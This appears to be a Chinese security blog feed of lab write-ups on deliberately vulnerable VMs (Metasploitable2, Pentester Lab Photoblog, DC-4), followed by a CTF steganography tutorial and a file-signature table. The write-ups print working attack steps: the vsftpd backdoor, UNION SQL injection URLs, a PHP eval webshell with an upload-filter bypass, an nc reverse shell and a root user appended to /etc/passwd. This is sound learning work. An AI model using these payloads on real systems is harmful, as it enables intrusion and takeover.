靶机:Metasploitable2(IP:未知)

攻击机:KALI(IP:192.168.198.131)

平台:VMware 16.2.4

信息收集

主机发现

arp-scan -l

QQ截图20221002130319

使用 nmap 进行扫描主机

nmap -sS -Pn -A -p- -n 192.168.198.132

image-20221002131822557

image-20221002131900368

nmap -sV -p- 192.168.198.132

image-20221002132014254

收集到的信息:

  • IP => 192.168.198.132

  • 开放的端口:(真的是相当的多啊…)

    • PORT // STATE // SERVICE // VERSION

    • 21/tcp open ftp vsftpd 2.3.4

    • 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

    • 23/tcp open telnet Linux telnetd

    • 25/tcp open smtp Postfix smtpd

    • 53/tcp open domain ISC BIND 9.4.2

    • 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)

    • 111/tcp open rpcbind 2 (RPC #100000)

    • 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

    • 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

    • 512/tcp open exec netkit-rsh rexecd

    • 513/tcp open login OpenBSD or Solaris rlogind

    • 514/tcp open tcpwrapped

    • 1099/tcp open java-rmi GNU Classpath grmiregistry

    • 1524/tcp open bindshell Metasploitable root shell

    • 2049/tcp open nfs 2-4 (RPC #100003)

    • 2121/tcp open ftp ProFTPD 1.3.1

    • 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

    • 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

    • 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

    • 5900/tcp open vnc VNC (protocol 3.3)

    • 6000/tcp open X11 (access denied)

    • 6667/tcp open irc UnrealIRCd

    • 6697/tcp open irc UnrealIRCd

    • 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

    • 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

    • 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)

    • 37649/tcp open mountd 1-3 (RPC #100005)

    • 41732/tcp open java-rmi GNU Classpath grmiregistry

    • 42063/tcp open status 1 (RPC #100024)

    • 58117/tcp open nlockmgr 1-4 (RPC #100021)

渗透测试

21端口

我们可以看到在上方开放的端口中的21端口,版本号是“vsftpd 2.3.4”。对于这个版本,我们可以发现存在“笑脸漏洞后门”:

这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:)”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有“:)”,所以称笑脸漏洞。

开始尝试攻击:

ftp连接靶机:

ftp 192.168.198.132

image-20221002150006975

随便起一个用户名,再用户名中加上笑脸符号:),密码随意。然后需要稍等片刻。完成后再对靶机端口进行扫描,会发现开启了一个6200端口:

image-20221002150312694

使用nc对靶机进行连接:

nc 192.168.198.132 6200

image-20221002150744826

直接获得root权限。

我们再使用MSF框架来试验一遍:

执行 msfconsole

msf6 > search vsftpd

image-20221002144134861

使用模块:

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

设置靶机IP:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.198.132

运行:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

image-20221002144431744

获取root权限成功。

更新中…

]]> Metasploitable是一个故意易受攻击的Linux虚拟机。此VM可用于进行安全培训、测试安全工具和实践常见的渗透测试技术。 VulnHub——DC-1靶机学习记录 https://blog.anineg.space/2022/09/24/dc1/ 2022-09-24T07:18:53.000Z 2023-06-01T06:27:29.436Z
]]> DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。 2022/9/10,来自广西桂林 https://blog.anineg.space/2022/09/10/letter1/ 2022-09-09T16:00:01.000Z 2022-09-09T04:52:12.844Z
]]> 有东西被加密了, 请输入密码查看. My Awesome Photoblog靶机学习记录 https://blog.anineg.space/2022/08/08/Photoblog/ 2022-08-08T10:33:22.000Z 2022-08-11T12:19:10.312Z 关于靶机

破解渗透测试实验室:从 SQL 注入到 Shell VM

‎你好,朋友们!!今天,我们将解决另一个CTF挑战“从SQL注入到Shell I”。此 VM 由 Pentester Lab 开发。您可以从此处下载:https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell,80/‎

‎在 VM 软件中安装 iso 映像并启动它。本练习中给出的任务是访问管理控制台并上传 PHP Webshell。‎

水平

‎初学者‎

说明

‎本练习说明如何从 SQL 注入中获取对管理控制台的访问权限。然后在管理控制台中,了解如何在系统上运行命令。‎

‎你会学到什么?‎

  • ‎使用 UNION 的 SQL 注入利用‎
  • ‎破解 md5 散列密码‎
  • ‎编写 PHP Webshell‎
名称PENTESTER LAB: FROM SQL INJECTION TO SHELL
发布日期2012年9月13日
作者Pentester Lab
系列Pentester Lab
网页https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell,80/

环境

靶机:My Awesome Photoblog(IP:192.168.3.108)

攻击机:KALI(IP:192.168.3.96)

平台:VMware 16.2.4

信息收集

主机发现

arp-scan -l

QQ截图20220808182145

使用nmap进行扫描主机

nmap -sS -Pn -A -p- -n 192.168.3.108

QQ截图20220808182345

nmap -sV -p- 192.168.3.108

QQ截图20220808182446

web指纹识别

whatweb -v 192.168.3.108

QQ截图20220808182618

网站目录扫描

dirb http://192.168.3.108 /usr/share/dirb/wordlists/big.txt

QQ截图20220808182855

查看html代码

访问http://192.168.3.108/Ctrl+U查看页面源代码:

QQ截图20220810194348

发现代码中有cat.php?id=1,疑似可以SQL注入。而admin/uploads/则可能是文件上传的路径。

收集到的信息:

  • IP => 192.168.3.108
  • 开放的端口:
    • 22 => ssh服务 —— OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0)
    • 80 => http服务 —— Apache httpd 2.2.16 ((Debian))
  • 扫描出来的网站目录
  • 疑似可以SQL注入
  • 可能存在文件上传

渗透测试

首先尝试登陆后台,这里介绍两种方法:

方法一:尝试进行SQL注入

判断是否可以注入:

构造url:

192.168.3.108/cat.php?id=1 and 1=1#

页面正常显示

192.168.3.108/cat.php?id=1 and 1=2#

页面不正常显示:

QQ截图20220810194602

结论:由此说明参数id存在sql注入。

判断列数

192.168.3.108/cat.php?id=1 order by 1

192.168.3.108/cat.php?id=1 order by 2

……

192.168.3.108/cat.php?id=1 order by 5

此时发生报错:

QQ截图20220810194855

则得知列数为4。

联合查询获取数据库名称

判断显示的列位:

192.168.3.108/cat.php?id=1 and 1=2 union select 1,2,3,4#

QQ截图20220810194926

得知第二列为显示位。继续查询数据库名:

192.168.3.108/cat.php?id=1 and 1=2 union select 1,database(),3,4#

QQ截图20220810194952

得知数据库名为 photoblog

联合查询遍历表名

192.168.3.108/cat.php?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables#

QQ截图20220810195115

发现有一个users表,可能是网站后台的账号密码。

查询users列名

192.168.3.108/cat.php?id=1 and 1=2 union select 1,column_name,3,4 from information_schema.columns where table_name = 'users'#

QQ截图20220810195157

查询users表数据

192.168.3.108/cat.php?id=1 and 1=2 union select 1,login,3,4 from users#

QQ截图20220810195228

得到后台管理员用户名 :

admin

192.168.3.108/cat.php?id=1 and 1=2 union select 1,password,3,4 from users#

QQ截图20220810195317

得到密文:

8efe310f9ab3efeae8d410a8e0166eb2

长度为32,猜测为md5加密,在cmd5网站解密:

QQ截图20220810195632

得到密码:

P4ssw0rd

登录后台

QQ截图20220810195712

方法二 :使用sqlmap

因为网页的标题是“My Awesome Photoblog”,可以猜测数据库名称为photoblog(在方法一中证明)

使用sqlmap获取该数据库的全部数据:

sqlmap –u http://192.168.3.108/cat.php?id=1 –D photoblog --dump-all --batch

QQ截图20220810200042

直接获得了账户名和登录密码:

QQ截图20220810200117

接下来getshell,这里介绍两种方法:

方法一:一句话木马+蚁剑连接

构造一句话木马yijuhua.php并上传, 发现提示不允许上传php。进行一下简单的文件上传绕过,修改后缀为.phP,成功上传。

1
<?PHP @eval($_POST['cmd']);?>

QQ截图20220810200441

蚁剑连接:

QQ截图20220810201802

QQ截图20220810202139

成功getshell!

方法二 :weevely(php菜刀)连接

使用kali中的工具weevely,生成一个webshell文件:

weevely generate hacker shell.php

QQ截图20220810202446

修改后缀为.phP进行文件上传,然后使用weevely连接webshell:

weevely http://192.168.0.131/admin/uploads/shell.PHP hacker

QQ截图20220810202826

成功连接。

参考文章:

Hack the Pentester Lab: from SQL injection to Shell VM

https://www.hackingarticles.in/hack-pentester-lab-sql-injection-shell-vm/

My Awesome Photoblog靶机渗透WP

https://www.jianshu.com/p/dd8768dd2b58

]]> 本练习说明如何从 SQL 注入中获取对管理控制台的访问权限。 某神奇社团的招新视频~ https://blog.anineg.space/2022/07/29/ladybug/ 2022-07-29T12:16:28.000Z 2022-08-09T04:02:56.824Z

Tips:如有背景音乐自动播放,可以在左下角弹窗内关闭。

]]> <div class="tip "><p>Tips:如有背景音乐自动播放,可以在左下角弹窗内关闭。</p> </div> <div align="center" class="aspect-ratio"> <iframe src="https://player.bilib VulnHub——DC-4靶机学习记录 https://blog.anineg.space/2022/07/25/dc4/ 2022-07-25T13:25:44.000Z 2022-10-02T04:46:55.303Z 关于DC-4

DC-4是另一个专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验。

与以前的DC版本不同,此版本主要为初学者/中级版本而设计。只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。

Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。

对于初学者来说,Google可以提供很大的帮助,但你可以随时在@DCAU7上发推文给我,寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。

名称DC- 4
发布日期2019年4月7日
作者DCAU
系列DC
网页https://www.vulnhub.com/entry/dc-4,313/

环境

靶机:DC-4(IP:未知)

攻击机:KALI(IP:192.168.3.96)

平台:VMware 16.2.4

信息收集

主机发现

arp-scan -l

scan1

使用nmap进行扫描主机

nmap -sS -Pn -A -p- -n 192.168.3.95

nmapss

nmap -sV -p- 192.168.3.95

nmapsv

web指纹识别

whatweb -v 192.168.3.95

whatweb

网站目录扫描

dirb http://192.168.3.95 /usr/share/dirb/wordlists/big.txt

dirb

收集到的信息:

  • 靶机IP => 192.168.3.95

  • 开放的端口:

    • 22 => ssh服务 —— OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
    • 80 => http服务 —— nginx 1.15.10

渗透测试

尝试用hydra进行爆破

hydra -l root -P /root/top1000.txt -vV -t 10 -o ssh.txt 192.168.15.152 ssh -s 22

hydra1

爆不出来,先去网页端看一看有什么有用的信息。

访问http://192.168.3.95/

0010

打开网页,是一个登录界面,开始用BP进行爆破,得到密码:

happy

baopo

登录进入,发现有可以执行命令的地方:

login

run

使用BP进行抓包,发现可以修改命令:

bp1

bp2

fire1

先执行一个反弹shell的命令:nc -e /bin/bash 192.168.3.95 4444

执行之前现在kali上监听4444端口:nc -lnvp 4444

listen

bp4

getshell成功:

ncsuccess

进入交互模式,便于操作:python -c 'import pty;pty.spawn("/bin/sh")'

先搜刮一下目录:

jim

查看jim用户下的backups,发现确实是密码的备份,cat打开进行查看,确实是密码。

bak

看看其他文件,mbox访问被拒绝:

catother

把密码copy到本地,用 hydra进行爆破:

hydra -l jim -P /home/kali/桌面/bak.txt ssh://192.168.3.95

hydrasuccess

得到密码:

jibril04

使用ssh远程登陆:

sshin1

注意系统提示有新的邮件。

找到邮件,发现 charles用户交给 jim用户保管的密码:

cdmail

jimmail

得到用户名和密码:

charles

^xHhA&hvim0y

再次使用ssh远程登陆到charles :

sshin2

查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

进行提权,直接向/etc/passwd中增加内容:

echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息

添加一个 hack用户,并使用teehee执行写入passwd中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

1
2
3
4
参数解释:
admin:x:0:0::/home/admin:/bin/bash
[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令

image-20220725223345603

得到flag:flag

参考文章:

菜鸟渗透日记24---DC-4靶机打靶过程详解

https://blog.csdn.net/leesir98/article/details/101620077

DC-4靶机渗透指南(渗透测试详细操作)

https://blog.csdn.net/weixin_45671944/article/details/121747512

【vulnhub】---DC-4靶机

https://blog.csdn.net/qq_43168364/article/details/106626917

]]> DC-4是另一个专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验。 CTF隐写术(其他文件隐写) https://blog.anineg.space/2022/07/10/yinxie2/ 2022-07-10T02:24:54.000Z 2022-07-25T13:31:47.662Z 电子文档隐写:

Word文件隐写:

隐藏文本功能隐写:

一是进入Word—文件—选项—显示—勾选“隐藏文字”。

image-20220725103241170

二是使用WinHex查看十六进制数据。

b427f23d6dc0dc14d28f5167c47a8f3

word文档的xml转换:

我们可以将word文档转换成xml格式,当然反过来我们也可以将xml转换成word文档,这导致了我们如果重新打包为word文档的过程中,有可能被隐藏进其他数据。

一是将后缀名改为.zip\rar\7z等压缩格式,打开即可查看。

010a0d81079b704958949fbcca8183a

二是使用WinHex查看十六进制数据。

295371d0b5f16cf0e8c0902afada3cb

PDF文件隐写:

分离方法:

wbStego分离:

在工具目录中找到 wbStego4open,使用工具载入文档,

  • Step 1 是文件介绍

  • Step 2 中,我们选择Decode,

  • Step 3 我们选择目标文件

  • Step 4 输入加密密码,这里我是空密码,直接跳过

  • Step 5 为保存文件为 flag.txt

    6f57d63adf5656c09126ce54dfa9c10

多媒体文件隐写:

音频隐写:

摩斯电码式:

打开音频文件尝试听一下内容,会听到类似电报的发文声。

摩尔斯电码对照表:

39ab9391a322baaa53670e1e2e84d49

解码方式:

用Adobe Auditon打开目标文件,并观察波形。长的代表代表横线,短的代表点,大的间隔是空格。

c6d46df848b2964460b4499b4f04d1d

翻译后的密文为:

-..- .. .- -. --.. .... .. .-.-.- .- .-.. .. -.-- ..- -. .-.-.- -.-. --- --

利用MP3stego进行的数据隐写:

MP3Stego命令:

加密:encode -E 加密文本 -P 密码 wav文件 mp3文件

解密:decode -X -P 密码 mp3文件

ad731d8f82fd5c10da3423887bbfac6

频谱图的音频隐写:

频谱是频率谱密度的简称,是频率的分布曲线。复杂振荡分解为振幅不同和频率不同的谐振荡,这些谐振荡的幅值按频率排列的图形叫做频谱。

在CTF中,我们可以单独只对一个声道中,隐写进信息。

分离方法:

使用Adobe Audition分离:

用AU打开音频文件,调整频谱显示,即可显示出flag。

339daf06a866ebb8734810e472ba1e1

视频隐写:

目前在CTF赛事中较为常出现的视频隐写,一般都是将一场带有隐写信息的图片,嵌入视频中,我们所需要做的就是将这个图片从视频分离出来,然后在分析我们分离出来的文件是什么,之后的操作可能会涉及到密码编码,图片隐写等知识点。

如果单独对视频来说ffmpeg是一个很好的工具,这里我使用的是foremost,当然我们也可以使用binwalk或者dd等工具,正如我们图片隐写中教大家分离图片所用的方法一样。区别是,ffmpeg将视频分解成一张一张的图片,foremost是一个基于文件头和尾部信息以及文件的内建数据结构恢复文件的命令行工具。

使用foremost分离:

分离命令:

foremost xxx.mp4

会自动生成output目录存放分离出文件。

使用steghide分离:

分离命令:

steghide extract -sf thing.jpg -p password

常用文件头尾标识:

JPEG/JPG:

  • 文件头标识(2 bytes):FF D8
  • 文件结束标识(2 bytes):FF D9

PNG:

  • 文件头标识(8 bytes):89 50 4E 47 0D 0A 1A 0A

GIF:

  • 文件头标识(6 bytes):47 49 46 38 39(37) 61
  • 文件结束标识(2 bytes):01 01 00 3B

BMP:

  • 文件头标识(2 bytes):42 4D

文件头标识及对应类型表:

扩展名文件头标识(HEX)文件描述
12300 00 1A 00 05 10 04Lotus 1-2-3 spreadsheet (v9) file
3gg; 3gp; 3g200 00 00 nn 66 74 79 70 33 67 703rd Generation Partnership Project 3GPP (nn=0x14) and 3GPP2 (nn=0x20) multimedia files
7z37 7A BC AF 27 1C7-ZIP compressed file
aba00 01 42 41Palm Address Book Archive file
abi41 4F 4C 49 4E 44 45 58AOL address book index file
aby; idx41 4F 4C 44 42AOL database files: address book (ABY) and user configuration data (MAIN.IDX)
accdb00 01 00 00 53 74 61 6E 64 61 72 64 20 41 43 45 20 44 42Microsoft Access 2007 file
ACM4D 5AMS audio compression manager driver
ADF44 4F 53Amiga disk file
adx03 00 00 00 41 50 50 52Lotus Approach ADX file
AIFF46 4F 52 4D 00Audio Interchange File
ain21 12AIN Compressed Archive File
ami5B 76 65 72 5DLotus Ami Pro
amr23 21 41 4D 52Adaptive Multi-Rate ACELP (Algebraic Code Excited Linear Prediction) Codec, commonly audio format with GSM cell phones
ANI52 49 46 46
API4D 5A 90 00 03 00 00 00Acrobat plug-in
arc1A 0xLH archive file, old version(where x = 0x2, 0x3, 0x4, 0x8 or 0x9 for types 1-5, respectively)
arc41 72 43 01FreeArc compressed file
arj60 EAARJ Compressed Archive
ARJ60 EA 27
ART4A 47 03 0E 00 00 00AOL ART file
ART4A 47 04 0E 00 00 00AOL ART file
asf30 26 B2 75 8E 66 CF 11Windows Media
asf; wma; wmv30 26 B2 75 8E 66 CF 11 A6 D9 00 AA 00 62 CE 6CMicrosoft Windows Media Audio/Video File(Advanced Streaming Format)
asx3CAdvanced Stream redirector file
au2E 73 6E 64SoundMachine Audio FileNeXT/Sun Microsystems μ-Law audio file
avi41 56 49 20Audio Video Interleave (AVI)
AX4D 5ALibrary cache file
AX4D 5A 90 00 03 00 00 00DirectShow filter
bag41 4F 4C 20 46 65 65 64 62 61 67AOL and AIM buddy list file
BAS20 20 20
bin42 4C 49 32 32 33 51Thomson Speedtouch series WLAN router firmware
bmp42 4DWindows Bitmap
BMP42 4D 3E
bz; bz242 5A 68BZIP Archive
BZ2; TAR.BZ2; TBZ2; TB242 5A 68bzip2 compressed archive
CAB49 53 63
CAB; HDR49 53 63 28Install Shield v5.x or 6.x compressed file
CAB4D 53 43 46Microsoft CAB File Format
cat30Microsoft security catalog file
CBD43 42 46 49 4C 45WordPerfect dictionary file (unconfirmed)
CCD5B 43 6C
cdrCDRCorel Draw
CDR45 4C 49 54 45 20 43 6F 6D 6D 61 6E 64 65 72 20Elite Plus Commander saved game file
CDR, DVF4D 53 5F 56 4F 49 43 45Sony Compressed Voice File
CHI; CHM49 54 53 46Microsoft Compiled HTML Help File
CHM49 54 53
CLB43 4D 58 31Corel Binary metafile
CLB43 4F 4D 2BCOM+ Catalog file
cnt3A 42 61 73 65
COM, DLL, DRV, EXE, PIF, QTS, QTX, SYS4D 5AWindows/DOS executable file
COM4D 5A EE
COME9 3B 03
CPE46 41 58 43 4F 56 45 52 2D 56 45 52Microsoft Fax Cover Sheet
CPL4D 5AControl panel application
CPT43 50 54 37 46 49 4C 45Corel Photopaint file
CPT43 50 54 46 49 4C 45Corel Photopaint file
CPX5B 57 69
cru; crush43 52 55 53 48CRUSH Archive File
CRU43 52 55 53 48 20 76Crush compressed archive
CRW49 49 1A 00 00 00 48 45 41 50 43 43 44 52 02 00Canon digital camera RAW file
CTF43 61 74 61 6C 6F 67 20 33 2E 30 30 00WhereIsIt Catalog file
CUR00 00 02 00 01 00 20 20Windows cursor file
dat03MapInfo Native Data Format
dat1A 52 54 53 20 43 4F 4D 50 52 45 53 53 45 44 20 49 4D 41 47 45 20 56 31 2E 30 1ARuntime Software disk image
dat41 56 47 36 5F 49 6E 74 65 67 72 69 74 79 5F 44 61 74 61 62 61 73 65AVG6 Integrity database file
DAT43 52 45 47Windows 9x registry hive
DAT43 6C 69 65 6E 74 20 55 72 6C 43 61 63 68 65 20 4D 4D 46 20 56 65 72 20IE History DAT file
DAT45 52 46 53 53 41 56 45 44 41 54 41 46 49 4C 45Kroll EasyRecovery Saved Recovery State file
DAT49 6E 6E 6F 20 53 65 74 75 70 20 55 6E 69 6E 73 74 61 6C 6C 20 4C 6F 67 20 28 62 29Inno Setup Uninstall Log file
db00 06 15 61 00 00 00 02 00 00 04 D2 00 00 10 00Netscape Navigator (v4) database file
DB44 42 46 48Palm Zire photo database
db08dBASE IV or dBFast configuration file
db303dBASE III file
db404dBASE IV data file
dba00 01 42 44Palm DateBook Archive file
dbxCF AD 12 FE
dbxCF AD 12 FE C5 FD 74 6FOutlook Express
dci3C 21 64 6F 63 74 79 70AOL HTML mail file
dcx3A DE 68 B1DCX Graphic File
DDB00 01 00
dib42 4Ddevice-independent bitmap image
DLL4D 5A 90
DMP4D 44 4D 50 93 A7Windows minidump file
DMS44 4D 53 21Amiga DiskMasher compressed archive
doc0D 44 4F 43DeskMate Document file
doc12 34 56 78 90 FFMS Word 6.0
doc31 BE 00 00 00 AB 00 00MS Word for DOS 6.0
doc7F FE 34 0AMS Word
dot; ppt; xla; ppa; pps; pot; msi; sdw; dbD0 CF 11 E0MS Office/OLE2
doc; dot; xls; xlt; xla; ppt; apr ;ppa; pps; pot; msi; sdw; dbD0 CF 11 E0 A1 B1 1A E1MS Compound Document v1 or Lotus Approach APR file
DPL4D 5A 50
DRV4D 5A 16
drw07A common signature and file extension for many drawing programs.
drw01 FF 02 04 03 02Micrografx vector graphic file
ds44D 47 58 20 69 74 70 64Micrografix Designer 4
DSN4D 56CD Stomper Pro label file
dsp23 20 4D 69 63 72 6F 73 6F 66 74 20 44 65 76 6 56C 6F 70 65 72 20 53 74 75 64 69 6FMicrosoft Developer Studio project file
dss02 64 73 73Digital Speech Standard (Olympus, Grundig, & Phillips)
dtd07 64 74 32 64 64 74 64DesignTools 2D Design file
dtd3C 21 45 4E 54 49 54 59XML DTD
DVR44 56 44DVR-Studio stream file
dwg41 43 31
dwg41 43 31 30Generic AutoCAD drawingNOTES on AutoCAD file headers: The 0x41-43-31-30 (AC10) is a generic header, occupying the first four bytes in the file. The next two bytes give further indication about the version or subtype:0x30-32 (02) — AutoCAD R2.50x30-33 (03) — AutoCAD R2.60x30-34 (04) — AutoCAD R90x30-36 (06) — AutoCAD R100x30-39 (09) — AutoCAD R11/R120x31-30 (10) — AutoCAD R13 (subtype 10)0x31-31 (11) — AutoCAD R13 (subtype 11)0x31-32 (12) — AutoCAD R13 (subtype 12)0x31-33 (13) — AutoCAD R14 (subtype 13)0x31-34 (14) — AutoCAD R14 (subtype 14)0x31-35 (15) — AutoCAD R20000x31-38 (18) — AutoCAD R20040x32-31 (21) — AutoCAD R2007
Enn (where nn are numbers)45 56 46EnCase evidence file
ECO2A 50 52
elf7F 45 4C 46 01 01 01 00ELF Executable
emf01 00 00 00 58 00 00 00Extended (Enhanced) Windows Metafile Format, printer spool file
eml44 65 6C 69 76 65 72 79 2D 64 61 74 65 3AEmail
EML46 72 6F 6D 20 20 20A commmon file extension for e-mail files. Signatures shown here are for Netscape, Eudora, and a generic signature, respectively. EML is also used by Outlook Express and QuickMail.
EML46 72 6F 6D 20 3F 3F 3FA commmon file extension for e-mail files. Signatures shown here are for Netscape, Eudora, and a generic signature, respectively. EML is also used by Outlook Express and QuickMail.
EML46 72 6F 6D 3A 20A commmon file extension for e-mail files. Signatures shown here are for Netscape, Eudora, and a generic signature, respectively. EML is also used by Outlook Express and QuickMail.
EML52 65 63
enc00 5C 41 B1 FFMujahideen Secrets 2 encrypted file
enl[32 byte offset] 40 40 40 20 00 00 40 40 40 40EndNote Library File
eps25 21 50 53Adobe EPS File
eps25 21 50 53 2D 41 64 6F 62 65Postscript
eps25 21 50 53 2D 41 64 6F 62 65 2D 33 2E 30 20 45 50 53 46 2D 33 20 30Adobe encapsulated PostScript file (If this signature is not at the immediate beginning of the file, it will occur early in the file, commonly at byte offset 30)
EPSC5 D0 D3
eth1A 35 01 00GN Nettest WinPharoah capture file
evt30 00 00 00 4C 66 4C 65Windows Event Viewer file
evt03 00 00 00 C4 66 C4 56
EVTX45 6C 66 46 69 6C 65 00Windows Vista event log file
exe; dll; drv; vxd; sys; ocx; vbx4D 5AWin32 Executable
exe; dll; drv; vxd; sys; ocx; vbx4D 5AWin16 Executable
exe; com; 386; ax; acm; sys; dll; drv; flt; fon; ocx; scr; lrc; vxd; cpl; x324D 5AExecutable File
EXE, DLL, OCX, OLB, IMM, IME4D 5A 90
fli00 11 AFFLIC Animation file
flt00 01 01OpenFlight 3D file
FLT4D 5A 90 00 03 00 00 00Audition graphic filter file (Adobe)
FLV46 4C 56 01Flash video file
fm3C 4D 61 6B 65 72 46 69 6C 65 20Adobe FrameMaker file
fm300 00 1A 00 07 80 01 00Lotus 123 v3 FMT file
fmt20 00 68 00 20 0Lotus 123 v4 FMT file
FNT43 48 41
FON4D 5AFont file
GBC87 F5 3E
gid3F 5F 03 00Windows Help Index File
GID4C 4E 02 00Windows Help index file
GIF47 49 46 38
gif47 49 46 38 37 61Graphics interchange format file (GIF 87A)
gif47 49 46 38 39 61Graphics interchange format file (GIF89A)
GTD7B 50 72
GX247 58 32Show Partner graphics file (not confirmed)
gz; tar; tgz1F 8BGzip Archive File
gz; tgz1F 8B 08GZ Compressed File
hap91 33 48 46HAP Archive File
HDMP4D 44 4D 50 93 A7Windows heap dump file
hdr23 3F 52 41 44 49 41 4E 43 45 0Aadiance High Dynamic Range image file
HLP3F 5F 03
hlp3F 5F 03 00Windows Help file
HLP4C 4E 02 00Windows Help file
hlp[7 byte offset] 00 00 FF FF FF FFWindows Help file
hqx28 54 68 69 73 20 66 69 6C 65Macintosh BinHex 4 Compressed Archive
hqx28 54 68 69 73 20 66 69 6C 65 20 6D 75 73 74 20 62 65 20 63 6F 6E 76 65 72 74 65 64 20 77 69 74 68 20 42 69 6E 48 65 78 20Macintosh BinHex 4 Compressed Archive
HTM3C 21 44
htm; html3C 21 44 4F 43 54HyperText Markup Language 3
htm; html3C 48 54 4D 4C 3EHyperText Markup Language 2
htm; html3C 68 74 6D 6C 3EHyperText Markup Language 1
html68 74 6D 6C 3EHTML
ico00 00 01 00 00Icon File
ico00 00 01 00 01 00 20 20Icon File
IFF46 4F 52 4D
IFO44 56 44DVD info file
IME4D 5A 90
img00 01 00 08 00 01 00 01 01Ventura Publisher/GEM VDI Image Format Bitmap file
IMG00 FF FF
IMM4D 5A 90
ind41 4F 4C 49 44 58AOL client preferences/settings file (MAIN.IND)
ISO43 44 30 30 31ISO-9660 CD Disc Image (This signature usually occurs at byte 8001, 8801, or 9001.)
ivr2E 52 45 43RealPlayer video file (V11 and later)
JAR4A 41 52 43 53 00JARCS compressed archive
jar5F 27 A8 89JAR Archive File
jpg; jpegFF D8 FF
jpg; jpe; jpegFF D8 FF E0 00JPG Graphic File
jpg; jpe; jpegFF D8 FF FE 00JPG Graphic File
KGB4B 47 42 5F 61 72 63 68 20 2DKGB archive
KOZ49 44 33 03 00 00 00Sprint Music Store audio file (for mobile devices)
LDB42 49 4C
lha2D 6C 68 35 2DLHA Compressed
lha; lzh[2 byte offset] 2D 6C 68Compressed archive file
LHP3F 5F 03
lhp3F 5F 03 00Windows Help File
lib21 3C 61 72 63 68 3E 0AUnix archiver (ar) files and Microsoft Program Library Common Object File Format (COFF)
LIB2A 24 20
LIT49 54 4F 4C 49 54 4C 53Microsoft Reader eBook file
LNK4C 00 00
lnk4C 00 00 00Windows Shortcut (Link File)
lnk4C 00 00 00 01 14 02Windows Link File
LNK4C 00 00 00 01 14 02 00Windows shortcut file
log2A 2A 2A 20 20 49 6E 73 74 61 6C 6C 61 74 69 6F 6E 20 53 74 61 72 74 65 64 20Symantec Wise Installer log file
lzhlhLz compression file
lwp57 6F 72 64 50 72 6FLotus WordPro v9
m3u23 45 58
m4a00 00 00 20 66 74 79 70 4D 34 41 20 00 00 00 00Apple Lossless Audio Codec file
m4a; m4v00 00 00 20 66 74 79 70 4D 34 41 20 00 00 00 00QuickTime M4A/M4V file
manifest3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3DWindows Visual Stylesheet XML file
MAR4D 41 52 31 00Mozilla archive
MAR4D 41 52 43Microsoft/MSN MARC archive
MAR4D 41 72 30 00MAr compressed archive
maxD0 CF 11
mdb00 01 00 00 53 74 61 6E 64 61 72 64 20 4A 65 74 20 44 42Microsoft Access file
mdb; mda; mde; mdt53 74 61 6E 64 61 72 64 20 4AMS Access
MDF00 FF FF
mdf00 FF FF FF FF FF FF FF FF FF FF 00 00 02 00 01Alcohol 120% CD image
mdf01 0F 00 00Microsoft SQL Server 2000 database
MDI45 50Microsoft Document Imaging file
MDS4D 45 44
MID; MIDI4D 54 68 64Musical Instrument Digital Interface (MIDI) sound file
mkv1A 45 DF A3 93 42 82 88 6D 61 74 72 6F 73 6B 61Matroska stream file
MLS4D 49 4C 45 53Milestones v1.0 project management and scheduling software (Also see “MV2C” and “MV214” signatures)
MLS4D 4C 53 57Skype localization data file
MLS4D 56 32 31 34Milestones v2.1b project management and scheduling software (Also see “MILES” and “MV2C” signatures)
MLS4D 56 32 43Milestones v2.1a project management and scheduling software (Also see “MILES” and “MV214” signatures)
MMF4D 4D 4D 44 00 00Yamaha Corp. Synthetic music Mobile Application Format (SMAF) for multimedia files that can be played on hand-held devices.
mny00 01 00 00 4D 53 49 53 41 4D 20 44 61 74 61 62 61 73 65Microsoft Money file
MOV00 00 0F
MOV00 00 77
mov6D 6F 6F 76Quicktime
mov6D 64 61 74QuickTime Movie
mp0C EDMonochrome Picture TIFF bitmap file (unconfirmed)
MP349 44 33MPEG-1 Audio Layer 3 (MP3) audio file
MP3FF FB 50
mp400 00 00 18 66 74 79 70 33 67 70 35MPEG-4 video files
MPA00 00 01
mpg; mpeg00 00 01 B3MPEG Movie
mpg00 00 01 BAMPEG
MSC3C 3F 78
